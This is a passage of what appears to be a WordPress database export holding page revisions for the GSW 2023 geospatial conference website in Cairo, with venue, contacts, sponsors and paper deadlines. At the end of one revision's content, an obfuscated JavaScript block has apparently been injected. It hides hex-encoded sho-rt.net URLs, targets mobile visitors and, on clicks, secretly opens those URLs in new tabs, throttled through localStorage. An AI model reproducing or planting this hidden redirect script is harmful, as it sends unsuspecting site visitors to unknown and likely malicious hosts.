style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\n<p>[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\">\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-04-22 12:47:24','2023-04-22 12:47:24','',3066,'https://gsw2023.com/?p=4095',0,'revision','',0),
(4096,1,'2023-04-22 12:48:12','2023-04-22 12:48:12','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1682167638505{margin-top: -25px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" 